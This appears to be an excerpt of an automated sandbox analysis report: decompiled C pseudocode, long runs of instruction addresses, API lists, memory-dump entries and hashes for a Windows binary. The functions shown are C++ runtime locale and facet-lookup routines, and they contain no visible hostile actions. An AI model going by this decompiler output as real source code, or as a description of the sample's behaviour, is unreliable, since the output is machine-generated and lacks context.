																						__eflags = _t322;
																						if(_t322 != 0) {
																							_t239 = _t322;
																							do {
																								__eflags = _t239 - _t322;
																								if(_t239 == _t322) {
																									_t276 = _t276 + 1;
																									__eflags = _t276;
																								}
																								_t239 =  *((intOrPtr*)(_t294 + 1));
																								_t294 = _t294 + 1;
																								__eflags = _t239;
																							} while (_t239 != 0);
																						}
																						_v156 = _t276;
																						_v128 = 0xf;
																						_v132 = 0;
																						_v148 = 0;
																						E003060B0( &_v148, _t276, 0);
																						_t277 = _v4;
																						_t296 = 0xfffffffe;
																						_t341 = _v8;
																						_v172 = 1;
																						while(1) {
																							_t323 = 0;
																							_v168 = _t296;
																							_t345 = 0;
																							_v169 = 0;
																							_v160 = 0;
																							__eflags = _v156;
																							if(_v156 <= 0) {
																								break;
																							} else {
																								goto L61;
																							}
																							do {
																								L61:
																								_t297 = _a4;
																								_t196 =  *((intOrPtr*)(_t345 + _t297));
																								__eflags = _t196;
																								if(_t196 != 0) {
																									_t308 =  *_t297;
																									_t278 = _a4;
																									while(1) {
																										__eflags = _t196 - _t308;
																										if(_t196 == _t308) {
																											break;
																										}
																										_t196 =  *((intOrPtr*)(_t345 + _t278 + 1));
																										_t345 = _t345 + 1;
																										__eflags = _t196;
																										if(_t196 != 0) {
																											continue;
																										}
																										break;
																									}
																									_t277 = _v4;
																									_t297 = _a4;
																								}
																								__eflags = _v128 - 0x10;
																								_t198 =  >=  ? _v148 :  &_v148;
																								__eflags =  *((char*)(_t198 + _t323));
																								if( *((char*)(_t198 + _t323)) == 0) {
																									_t345 = _t345 + _v164;
																									_t199 = _t345 + _t297;
																									_v152 = _t199;
																									_t200 =  *_t199;
																									__eflags = _t200 -  *_t297;
																									if(_t200 ==  *_t297) {
																										L106:
																										__eflags = _v128 - 0x10;
																										_t325 =  >=  ? _v148 :  &_v148;
																										__eflags = _v164 - 0x7f;
																										_t299 =  <  ? _v164 & 0x000000ff : 0x7f;
																										_t203 = _v160;
																										 *((char*)(( >=  ? _v148 :  &_v148) + _t203)) =  <  ? _v164 & 0x000000ff : 0x7f;
																										_t323 = _t203;
																										_t296 = _t323;
																										_v168 = _t296;
																										goto L107;
																									} else {
																										__eflags = _t200;
																										if(_t200 == 0) {
																											goto L106;
																										} else {
																											__eflags = _t341[1];
																											if(_t341[1] == 0) {
																												_t307 =  *_t341;
																												__eflags = _t307;
																												if(_t307 == 0) {
																													L78:
																													 *_t341 = 0;
																												} else {
																													_t334 =  *( *(_t307 + 0x1c));
																													__eflags = _t334;
																													if(_t334 == 0) {
																														L75:
																														_t234 =  *((intOrPtr*)( *_t307 + 0x18))();
																													} else {
																														__eflags =  *( *(_t307 + 0x2c));
																														if( *( *(_t307 + 0x2c)) <= 0) {
																															goto L75;
																														} else {
																															_t234 =  *_t334 & 0x000000ff;
																														}
																													}
																													__eflags = _t234 - 0xffffffff;
																													if(_t234 == 0xffffffff) {
																														goto L78;
																													} else {
																														_t341[1] = _t234;
																													}
																												}
																												_t341[1] = 1;
																											}
																											__eflags = _t277[1];
																											if(_t277[1] == 0) {
																												_t306 =  *_t277;
																												__eflags = _t306;
																												if(_t306 == 0) {
																													L88:
																													 *_t277 = 0;
																												} else {
																													_t333 =  *( *(_t306 + 0x1c));
																													__eflags = _t333;
																													if(_t333 == 0) {
																														L85:
																														_t230 =  *((intOrPtr*)( *_t306 + 0x18))();
																													} else {
																														__eflags =  *( *(_t306 + 0x2c));
																														if( *( *(_t306 + 0x2c)) <= 0) {
																															goto L85;
																														} else {
																															_t230 =  *_t333 & 0x000000ff;
																														}
																													}
																													__eflags = _t230 - 0xffffffff;
																													if(_t230 == 0xffffffff) {
																														goto L88;
																													} else {
																														_t277[1] = _t230;
																													}
																												}
																												_t277[1] = 1;
																											}
																											_t303 =  *_t341;
																											__eflags = _t303;
																											if(_t303 != 0) {
																												__eflags =  *_t277;
																												if( *_t277 != 0) {
																													goto L92;
																												} else {
																													goto L94;
																												}
																											} else {
																												__eflags =  *_t277 - _t303;
																												if( *_t277 != _t303) {
																													L94:
																													__eflags = _t341[1];
																													if(_t341[1] == 0) {
																														__eflags = _t303;
																														if(_t303 == 0) {
																															L102:
																															 *_t341 = 0;
																														} else {
																															_t332 =  *( *(_t303 + 0x1c));
																															__eflags = _t332;
																															if(_t332 == 0) {
																																L99:
																																_t226 =  *((intOrPtr*)( *_t303 + 0x18))();
																															} else {
																																__eflags =  *( *(_t303 + 0x2c));
																																if( *( *(_t303 + 0x2c)) <= 0) {
																																	goto L99;
																																} else {
																																	_t226 =  *_t332 & 0x000000ff;
																																}
																															}
																															__eflags = _t226 - 0xffffffff;
																															if(_t226 == 0xffffffff) {
																																goto L102;
																															} else {
																																_t341[1] = _t226;
																															}
																														}
																														_t341[1] = 1;
																													}
																													__eflags =  *_v152 - _t341[1];
																													if( *_v152 != _t341[1]) {
																														goto L92;
																													} else {
																														_t323 = _v160;
																														_t204 = 1;
																														_t296 = _v168;
																														_v169 = 1;
																													}
																												} else {
																													L92:
																													__eflags = _v128 - 0x10;
																													_t331 =  >=  ? _v148 :  &_v148;
																													__eflags = _v164 - 0x7f;
																													_t305 =  <  ? _v164 & 0x000000ff : 0x7f;
																													_t221 = _v160;
																													 *((char*)(( >=  ? _v148 :  &_v148) + _t221)) =  <  ? _v164 & 0x000000ff : 0x7f;
																													_t323 = _t221;
																													_t296 = _v168;
																													goto L107;
																												}
																											}
																										}
																									}
																								} else {
																									__eflags = _v128 - 0x10;
																									_t296 = _v168;
																									_t237 =  >=  ? _v148 :  &_v148;
																									_t345 = _t345 +  *((char*)(( >=  ? _v148 :  &_v148) + _t323));
																									L107:
																									_t204 = _v169;
																								}
																								_t323 = _t323 + 1;
																								_v160 = _t323;
																								__eflags = _t323 - _v156;
																							} while (_t323 < _v156);
																							__eflags = _t204;
																							if(_t204 != 0) {
																								__eflags = _t341[1];
																								if(_t341[1] == 0) {
																									_t302 =  *_t341;
																									__eflags = _t302;
																									if(_t302 == 0) {
																										L118:
																										 *_t341 = 0;
																									} else {
																										_t329 =  *( *(_t302 + 0x1c));
																										__eflags = _t329;
																										if(_t329 == 0) {
																											L115:
																											_t217 =  *((intOrPtr*)( *_t302 + 0x18))();
																										} else {
																											__eflags =  *( *(_t302 + 0x2c));
																											if( *( *(_t302 + 0x2c)) <= 0) {
																												goto L115;
																											} else {
																												_t217 =  *_t329 & 0x000000ff;
																											}
																										}
																										__eflags = _t217 - 0xffffffff;
																										if(_t217 == 0xffffffff) {
																											goto L118;
																										} else {
																											_t341[1] = _t217;
																										}
																									}
																									_t341[1] = 1;
																								}
																								__eflags = _t277[1];
																								if(_t277[1] == 0) {
																									_t301 =  *_t277;
																									__eflags = _t301;
																									if(_t301 == 0) {
																										L128:
																										 *_t277 = 0;
																									} else {
																										_t328 =  *( *(_t301 + 0x1c));
																										__eflags = _t328;
																										if(_t328 == 0) {
																											L125:
																											_t213 =  *((intOrPtr*)( *_t301 + 0x18))();
																										} else {
																											__eflags =  *( *(_t301 + 0x2c));
																											if( *( *(_t301 + 0x2c)) <= 0) {
																												goto L125;
																											} else {
																												_t213 =  *_t328 & 0x000000ff;
																											}
																										}
																										__eflags = _t213 - 0xffffffff;
																										if(_t213 == 0xffffffff) {
																											goto L128;
																										} else {
																											_t277[1] = _t213;
																										}
																									}
																									_t277[1] = 1;
																								}
																								_t300 =  *_t341;
																								__eflags = _t300;
																								if(_t300 != 0) {
																									__eflags =  *_t277;
																									if( *_t277 != 0) {
																										goto L132;
																									} else {
																										goto L136;
																									}
																								} else {
																									__eflags =  *_t277 - _t300;
																									if( *_t277 != _t300) {
																										L136:
																										_v164 = _v164 + 1;
																										__eflags = _t300;
																										if(_t300 == 0) {
																											L143:
																											 *_t341 = 0;
																											_t296 = _t300 | 0xffffffff;
																											_t341[1] = 1;
																											continue;
																										} else {
																											__eflags =  *( *(_t300 + 0x1c));
																											if( *( *(_t300 + 0x1c)) == 0) {
																												L140:
																												_t207 = ( *_t300)[0x1c]();
																											} else {
																												_t326 =  *(_t300 + 0x2c);
																												_t208 =  *_t326;
																												__eflags = _t208;
																												if(_t208 <= 0) {
																													goto L140;
																												} else {
																													 *_t326 = _t208 - 1;
																													_t300 =  *(_t300 + 0x1c);
																													_t327 =  *_t300;
																													 *_t300 =  &(_t327[1]);
																													_t207 =  *_t327 & 0x000000ff;
																												}
																											}
																											__eflags = _t207 - 0xffffffff;
																											if(_t207 == 0xffffffff) {
																												goto L143;
																											} else {
																												_t341[1] = 0;
																												_t296 = _t300 | 0xffffffff;
																												continue;
																											}
																										}
																										goto L145;
																									} else {
																										L132:
																										_t296 = _v168;
																									}
																								}
																							}
																							break;
																						}
																						__eflags = _v128 - 0x10;
																						if(_v128 < 0x10) {
																							return _t296;
																						} else {
																							L0030DF6A(_v148);
																							return _v168;
																						}
																					} else {
																						_t344 = _v16;
																						 *0x333a50 = _t344;
																						 *((intOrPtr*)( *_t344 + 4))();
																						E00308645(_t344);
																						goto L52;
																					}
																				} else {
																					E00309A52( &_v24);
																					return _t275;
																				}
																			} else {
																				_t344 =  *( *((intOrPtr*)(_t244 + 8)) + _t340 * 4);
																				goto L47;
																			}
																		}
																	}
																}
															} else {
																_t343 = _v12;
																 *0x333a58 = _t343;
																 *((intOrPtr*)( *_t343 + 4))();
																E00308645(_t343);
																goto L34;
															}
														} else {
															E00309A52( &_v20);
															return _t274;
														}
													} else {
														_t343 =  *( *((intOrPtr*)(_t255 + 8)) + _t339 * 4);
														goto L29;
													}
												}
											}
										}
									} else {
										_t342 = _v8;
										 *0x333a54 = _t342;
										 *((intOrPtr*)( *_t342 + 4))();
										E00308645(_t342);
										goto L16;
									}
								} else {
									E00309A52( &_v16);
									return _t273;
								}
							} else {
								_t342 =  *( *((intOrPtr*)(_t266 + 8)) + _t338 * 4);
								goto L11;
							}
						}
					}
				}
				L145:
			}




































































































                                            0x0030798e
                                            0x00307993
                                            0x00307999
                                            0x0030799f
                                            0x003079a4
                                            0x003079aa
                                            0x003079af
                                            0x003079b5
                                            0x003079b7
                                            0x003079bc
                                            0x003079bd
                                            0x003079c2
                                            0x003079c2
                                            0x003079ca
                                            0x003079cf
                                            0x003079cf
                                            0x003079d8
                                            0x003079dd
                                            0x003079eb
                                            0x003079eb
                                            0x00000000
                                            0x003079df
                                            0x003079e2
                                            0x003079e7
                                            0x00307a4b
                                            0x00307a4e
                                            0x00307a5b
                                            0x003079e9
                                            0x003079ed
                                            0x003079f1
                                            0x00307a03
                                            0x00307a05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003079f3
                                            0x003079f3
                                            0x003079fb
                                            0x00307a07
                                            0x00307a09
                                            0x00307a25
                                            0x00307a2a
                                            0x00307a2d
                                            0x00307a30
                                            0x00307a64
                                            0x00307a72
                                            0x00307a77
                                            0x00307a78
                                            0x00307a79
                                            0x00307a7a
                                            0x00307a7b
                                            0x00307a7c
                                            0x00307a7d
                                            0x00307a7e
                                            0x00307a7f
                                            0x00307a81
                                            0x00307a83
                                            0x00307a86
                                            0x00307a87
                                            0x00307a88
                                            0x00307a8e
                                            0x00307a93
                                            0x00307a99
                                            0x00307a9f
                                            0x00307aa2
                                            0x00307aa4
                                            0x00307aaa
                                            0x00307aaf
                                            0x00307ab5
                                            0x00307ab7
                                            0x00307abc
                                            0x00307abc
                                            0x00307abd
                                            0x00307ac2
                                            0x00307ac2
                                            0x00307aca
                                            0x00307acf
                                            0x00307acf
                                            0x00307ad8
                                            0x00307ada
                                            0x00307add
                                            0x00307aeb
                                            0x00307aeb
                                            0x00000000
                                            0x00307adf
                                            0x00307ae2
                                            0x00307ae5
                                            0x00307ae7
                                            0x00307b4b
                                            0x00307b4e
                                            0x00307b5b
                                            0x00307ae9
                                            0x00307aed
                                            0x00307aed
                                            0x00307af1
                                            0x00307b03
                                            0x00307b03
                                            0x00307b05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307af3
                                            0x00307af3
                                            0x00307af8
                                            0x00307afb
                                            0x00307b07
                                            0x00307b07
                                            0x00307b09
                                            0x00307b25
                                            0x00307b2a
                                            0x00307b2d
                                            0x00307b30
                                            0x00307b64
                                            0x00307b72
                                            0x00307b77
                                            0x00307b78
                                            0x00307b79
                                            0x00307b7a
                                            0x00307b7b
                                            0x00307b7c
                                            0x00307b7d
                                            0x00307b7e
                                            0x00307b7f
                                            0x00307b80
                                            0x00307b81
                                            0x00307b86
                                            0x00307b87
                                            0x00307b88
                                            0x00307b8e
                                            0x00307b93
                                            0x00307b99
                                            0x00307b9f
                                            0x00307ba2
                                            0x00307ba4
                                            0x00307baa
                                            0x00307baf
                                            0x00307bb5
                                            0x00307bb7
                                            0x00307bbc
                                            0x00307bbc
                                            0x00307bbd
                                            0x00307bc2
                                            0x00307bc2
                                            0x00307bca
                                            0x00307bcf
                                            0x00307bcf
                                            0x00307bd8
                                            0x00307bda
                                            0x00307bdd
                                            0x00307beb
                                            0x00307beb
                                            0x00000000
                                            0x00307bdf
                                            0x00307be2
                                            0x00307be5
                                            0x00307be7
                                            0x00307c4b
                                            0x00307c4e
                                            0x00307c5b
                                            0x00307be9
                                            0x00307bed
                                            0x00307bed
                                            0x00307bf1
                                            0x00307c03
                                            0x00307c03
                                            0x00307c05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307bf3
                                            0x00307bf3
                                            0x00307bf8
                                            0x00307bfb
                                            0x00307c07
                                            0x00307c07
                                            0x00307c09
                                            0x00307c25
                                            0x00307c2d
                                            0x00307c30
                                            0x00307c64
                                            0x00307c72
                                            0x00307c77
                                            0x00307c78
                                            0x00307c79
                                            0x00307c7a
                                            0x00307c7b
                                            0x00307c7c
                                            0x00307c7d
                                            0x00307c7e
                                            0x00307c7f
                                            0x00307c80
                                            0x00307c86
                                            0x00307c8c
                                            0x00307c8e
                                            0x00307c8f
                                            0x00307c92
                                            0x00307c93
                                            0x00307c94
                                            0x00307c96
                                            0x00307c98
                                            0x00307ca0
                                            0x00307ca0
                                            0x00307ca2
                                            0x00307ca4
                                            0x00307ca4
                                            0x00307ca4
                                            0x00307ca5
                                            0x00307ca8
                                            0x00307ca9
                                            0x00307ca9
                                            0x00307ca0
                                            0x00307cb4
                                            0x00307cb8
                                            0x00307cc0
                                            0x00307cc8
                                            0x00307ccd
                                            0x00307cd2
                                            0x00307cd5
                                            0x00307cda
                                            0x00307cdd
                                            0x00307ce5
                                            0x00307ce5
                                            0x00307ce7
                                            0x00307ceb
                                            0x00307ced
                                            0x00307cf2
                                            0x00307cf6
                                            0x00307cfa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d00
                                            0x00307d00
                                            0x00307d00
                                            0x00307d03
                                            0x00307d06
                                            0x00307d08
                                            0x00307d0a
                                            0x00307d0c
                                            0x00307d10
                                            0x00307d10
                                            0x00307d12
                                            0x00000000
                                            0x00000000
                                            0x00307d14
                                            0x00307d18
                                            0x00307d19
                                            0x00307d1b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d1b
                                            0x00307d1d
                                            0x00307d20
                                            0x00307d20
                                            0x00307d23
                                            0x00307d2c
                                            0x00307d31
                                            0x00307d35
                                            0x00307d54
                                            0x00307d58
                                            0x00307d5b
                                            0x00307d5f
                                            0x00307d61
                                            0x00307d63
                                            0x00307e7d
                                            0x00307e7d
                                            0x00307e8f
                                            0x00307e94
                                            0x00307e9b
                                            0x00307e9e
                                            0x00307ea2
                                            0x00307ea5
                                            0x00307ea7
                                            0x00307ea9
                                            0x00000000
                                            0x00307d69
                                            0x00307d69
                                            0x00307d6b
                                            0x00000000
                                            0x00307d71
                                            0x00307d71
                                            0x00307d75
                                            0x00307d77
                                            0x00307d79
                                            0x00307d7b
                                            0x00307da2
                                            0x00307da2
                                            0x00307d7d
                                            0x00307d80
                                            0x00307d82
                                            0x00307d84
                                            0x00307d93
                                            0x00307d95
                                            0x00307d86
                                            0x00307d89
                                            0x00307d8c
                                            0x00000000
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d8c
                                            0x00307d98
                                            0x00307d9b
                                            0x00000000
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9b
                                            0x00307da8
                                            0x00307da8
                                            0x00307dac
                                            0x00307db0
                                            0x00307db2
                                            0x00307db4
                                            0x00307db6
                                            0x00307ddd
                                            0x00307ddd
                                            0x00307db8
                                            0x00307dbb
                                            0x00307dbd
                                            0x00307dbf
                                            0x00307dce
                                            0x00307dd0
                                            0x00307dc1
                                            0x00307dc4
                                            0x00307dc7
                                            0x00000000
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dc7
                                            0x00307dd3
                                            0x00307dd6
                                            0x00000000
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd6
                                            0x00307de3
                                            0x00307de3
                                            0x00307de7
                                            0x00307de9
                                            0x00307deb
                                            0x00307e24
                                            0x00307e27
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307ded
                                            0x00307ded
                                            0x00307def
                                            0x00307e29
                                            0x00307e29
                                            0x00307e2d
                                            0x00307e2f
                                            0x00307e31
                                            0x00307e58
                                            0x00307e58
                                            0x00307e33
                                            0x00307e36
                                            0x00307e38
                                            0x00307e3a
                                            0x00307e49
                                            0x00307e4b
                                            0x00307e3c
                                            0x00307e3f
                                            0x00307e42
                                            0x00000000
                                            0x00307e44
                                            0x00307e44
                                            0x00307e44
                                            0x00307e42
                                            0x00307e4e
                                            0x00307e51
                                            0x00000000
                                            0x00307e53
                                            0x00307e53
                                            0x00307e53
                                            0x00307e51
                                            0x00307e5e
                                            0x00307e5e
                                            0x00307e68
                                            0x00307e6b
                                            0x00000000
                                            0x00307e6d
                                            0x00307e6d
                                            0x00307e71
                                            0x00307e73
                                            0x00307e77
                                            0x00307e77
                                            0x00307df1
                                            0x00307df1
                                            0x00307df1
                                            0x00307e03
                                            0x00307e08
                                            0x00307e0f
                                            0x00307e12
                                            0x00307e16
                                            0x00307e19
                                            0x00307e1b
                                            0x00000000
                                            0x00307e1b
                                            0x00307def
                                            0x00307deb
                                            0x00307d6b
                                            0x00307d37
                                            0x00307d37
                                            0x00307d40
                                            0x00307d44
                                            0x00307d4d
                                            0x00307ead
                                            0x00307ead
                                            0x00307ead
                                            0x00307eb1
                                            0x00307eb2
                                            0x00307eb6
                                            0x00307eb6
                                            0x00307ec0
                                            0x00307ec2
                                            0x00307ec8
                                            0x00307ecc
                                            0x00307ece
                                            0x00307ed0
                                            0x00307ed2
                                            0x00307ef9
                                            0x00307ef9
                                            0x00307ed4
                                            0x00307ed7
                                            0x00307ed9
                                            0x00307edb
                                            0x00307eea
                                            0x00307eec
                                            0x00307edd
                                            0x00307ee0
                                            0x00307ee3
                                            0x00000000
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ee3
                                            0x00307eef
                                            0x00307ef2
                                            0x00000000
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef2
                                            0x00307eff
                                            0x00307eff
                                            0x00307f03
                                            0x00307f07
                                            0x00307f09
                                            0x00307f0b
                                            0x00307f0d
                                            0x00307f34
                                            0x00307f34
                                            0x00307f0f
                                            0x00307f12
                                            0x00307f14
                                            0x00307f16
                                            0x00307f25
                                            0x00307f27
                                            0x00307f18
                                            0x00307f1b
                                            0x00307f1e
                                            0x00000000
                                            0x00307f20
                                            0x00307f20
                                            0x00307f20
                                            0x00307f1e
                                            0x00307f2a
                                            0x00307f2d
                                            0x00000000
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2d
                                            0x00307f3a
                                            0x00307f3a
                                            0x00307f3e
                                            0x00307f40
                                            0x00307f42
                                            0x00307f6a
                                            0x00307f6d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307f44
                                            0x00307f44
                                            0x00307f46
                                            0x00307f6f
                                            0x00307f6f
                                            0x00307f73
                                            0x00307f75
                                            0x00307fb0
                                            0x00307fb0
                                            0x00307fb6
                                            0x00307fb9
                                            0x00000000
                                            0x00307f77
                                            0x00307f7a
                                            0x00307f7d
                                            0x00307f9a
                                            0x00307f9c
                                            0x00307f7f
                                            0x00307f7f
                                            0x00307f82
                                            0x00307f84
                                            0x00307f86
                                            0x00000000
                                            0x00307f88
                                            0x00307f89
                                            0x00307f8b
                                            0x00307f8e
                                            0x00307f93
                                            0x00307f95
                                            0x00307f95
                                            0x00307f86
                                            0x00307f9f
                                            0x00307fa2
                                            0x00000000
                                            0x00307fa4
                                            0x00307fa4
                                            0x00307fa8
                                            0x00000000
                                            0x00307fa8
                                            0x00307fa2
                                            0x00000000
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f46
                                            0x00307f42
                                            0x00000000
                                            0x00307ec2
                                            0x00307f4c
                                            0x00307f51
                                            0x00307fca
                                            0x00307f53
                                            0x00307f57
                                            0x00307f69
                                            0x00307f69
                                            0x00307c32
                                            0x00307c32
                                            0x00307c37
                                            0x00307c3f
                                            0x00307c43
                                            0x00000000
                                            0x00307c48
                                            0x00307c0b
                                            0x00307c10
                                            0x00307c1d
                                            0x00307c1d
                                            0x00307bfd
                                            0x00307c00
                                            0x00000000
                                            0x00307c00
                                            0x00307bfb
                                            0x00307bf1
                                            0x00307be7
                                            0x00307b32
                                            0x00307b32
                                            0x00307b37
                                            0x00307b3f
                                            0x00307b43
                                            0x00000000
                                            0x00307b48
                                            0x00307b0b
                                            0x00307b10
                                            0x00307b1d
                                            0x00307b1d
                                            0x00307afd
                                            0x00307b00
                                            0x00000000
                                            0x00307b00
                                            0x00307afb
                                            0x00307af1
                                            0x00307ae7
                                            0x00307a32
                                            0x00307a32
                                            0x00307a37
                                            0x00307a3f
                                            0x00307a43
                                            0x00000000
                                            0x00307a48
                                            0x00307a0b
                                            0x00307a10
                                            0x00307a1d
                                            0x00307a1d
                                            0x003079fd
                                            0x00307a00
                                            0x00000000
                                            0x00307a00
                                            0x003079fb
                                            0x003079f1
                                            0x003079e7
                                            0x00000000

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030798E
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003079AA
                                            • std::_Facet_Register.LIBCPMT ref: 00307A43
                                            • std::bad_exception::bad_exception.LIBCMT ref: 00307A64
                                              • Part of subcall function 0030D31B: std::exception::exception.LIBCMT ref: 0030D325
                                            • __CxxThrowException@8.LIBCMT ref: 00307A72
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::_$LockitLockit::_$ExceptionException@8Facet_RaiseRegisterThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
                                            • String ID: bad cast
                                            • API String ID: 3247575091-3145022300
                                            • Opcode ID: 501115873006fc4ab2cade405caf755569c3598f24d97e15eab3caffbd92cddd
                                            • Instruction ID: 1d50b9c7c6f8047f2ba1907ce3195b1f0fb7a84fb0c1c06d749f681e62d31478
                                            • Opcode Fuzzy Hash: 501115873006fc4ab2cade405caf755569c3598f24d97e15eab3caffbd92cddd
                                            • Instruction Fuzzy Hash: 6B31C832E061149BCB13DF98D8A1A9DF7B8EF54320F1181AAEC455B692DB31BE45CBC0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00307A80, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 92%
                                            			E00307A80(intOrPtr* _a4, intOrPtr* _a8) {
				signed int* _v0;
				signed int* _v4;
				void* _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v32;
				signed int _v48;
				char _v56;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr _v88;
				signed int _v92;
				char _v108;
				intOrPtr* _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _v129;
				signed int _v132;
				void* _t150;
				void* _t158;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t170;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t178;
				signed int _t183;
				signed int _t187;
				signed int _t191;
				signed int _t196;
				signed int _t200;
				signed int _t204;
				signed int _t209;
				void* _t214;
				signed int _t219;
				signed int _t220;
				void* _t225;
				signed int _t230;
				signed int _t231;
				char _t232;
				signed int _t233;
				signed int _t234;
				signed int* _t235;
				intOrPtr _t236;
				intOrPtr _t239;
				signed int _t244;
				intOrPtr* _t247;
				signed int _t249;
				intOrPtr* _t250;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t259;
				signed int _t260;
				intOrPtr _t261;
				void* _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t275;
				signed char* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t286;
				signed int _t287;
				signed int* _t288;
				intOrPtr* _t289;
				signed int _t290;
				void* _t291;
				void* _t295;
				void* _t297;
				void* _t298;
				void* _t307;

				E003099F7( &_v16, 0);
				_t286 =  *0x333a64; // 0x0
				_t232 =  *0x333a58; // 0x0
				_v8 = _t232;
				if(_t286 == 0) {
					E003099F7( &_v12, _t286);
					_t307 =  *0x333a64 - _t286; // 0x0
					if(_t307 == 0) {
						_t230 =  *0x331924; // 0x1
						_t231 = _t230 + 1;
						 *0x331924 = _t231;
						 *0x333a64 = _t231;
					}
					E00309A52( &_v12);
					_t286 =  *0x333a64; // 0x0
				}
				_t239 =  *_a4;
				if(_t286 >=  *((intOrPtr*)(_t239 + 0xc))) {
					_t289 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t239 + 8)) + _t286 * 4));
					if(_t289 != 0) {
						L16:
						E00309A52( &_v16);
						return _t289;
					} else {
						L8:
						if( *((char*)(_t239 + 0x14)) == 0) {
							L11:
							if(_t289 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t225 = E0030866D();
							if(_t286 >=  *((intOrPtr*)(_t225 + 0xc))) {
								L12:
								if(_t232 == 0) {
									_t150 = E003080F0(_t270,  &_v8, _a4);
									_t298 = _t297 + 8;
									__eflags = _t150 - 0xffffffff;
									if(_t150 == 0xffffffff) {
										E0030D31B( &_v28, "bad cast");
										E0030F4FA( &_v28, 0x32d290);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t295 = _t298;
										_push(_t232);
										_push(_t289);
										_push(_t286);
										E003099F7( &_v56, 0);
										_t287 =  *0x333a60; // 0x0
										_t233 =  *0x333a50; // 0x0
										_v48 = _t233;
										__eflags = _t287;
										if(_t287 == 0) {
											E003099F7( &_v16, _t287);
											__eflags =  *0x333a60 - _t287; // 0x0
											if(__eflags == 0) {
												_t219 =  *0x331924; // 0x1
												_t220 = _t219 + 1;
												__eflags = _t220;
												 *0x331924 = _t220;
												 *0x333a60 = _t220;
											}
											E00309A52( &_v16);
											_t287 =  *0x333a60; // 0x0
										}
										_t244 =  *_v0;
										__eflags = _t287 -  *((intOrPtr*)(_t244 + 0xc));
										if(_t287 >=  *((intOrPtr*)(_t244 + 0xc))) {
											_t290 = 0;
											__eflags = 0;
											goto L26;
										} else {
											_t290 =  *( *((intOrPtr*)(_t244 + 8)) + _t287 * 4);
											__eflags = _t290;
											if(_t290 != 0) {
												L34:
												E00309A52( &_v20);
												return _t290;
											} else {
												L26:
												__eflags =  *((char*)(_t244 + 0x14));
												if( *((char*)(_t244 + 0x14)) == 0) {
													L29:
													__eflags = _t290;
													if(_t290 != 0) {
														goto L34;
													} else {
														goto L30;
													}
												} else {
													_t214 = E0030866D();
													__eflags = _t287 -  *((intOrPtr*)(_t214 + 0xc));
													if(_t287 >=  *((intOrPtr*)(_t214 + 0xc))) {
														L30:
														__eflags = _t233;
														if(_t233 == 0) {
															_t158 = E00308170(_t270,  &_v12, _v0);
															__eflags = _t158 - 0xffffffff;
															if(_t158 == 0xffffffff) {
																E0030D31B( &_v32, "bad cast");
																E0030F4FA( &_v32, 0x32d290);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t295);
																_t247 = _v64;
																_t271 =  *_t247;
																_push(_t233);
																_t234 = _v68;
																_push(_t290);
																_push(_t287);
																__eflags = _t271;
																if(_t271 != 0) {
																	_t209 = _t271;
																	do {
																		__eflags = _t209 - _t271;
																		if(_t209 == _t271) {
																			_t234 = _t234 + 1;
																			__eflags = _t234;
																		}
																		_t209 =  *((intOrPtr*)(_t247 + 1));
																		_t247 = _t247 + 1;
																		__eflags = _t209;
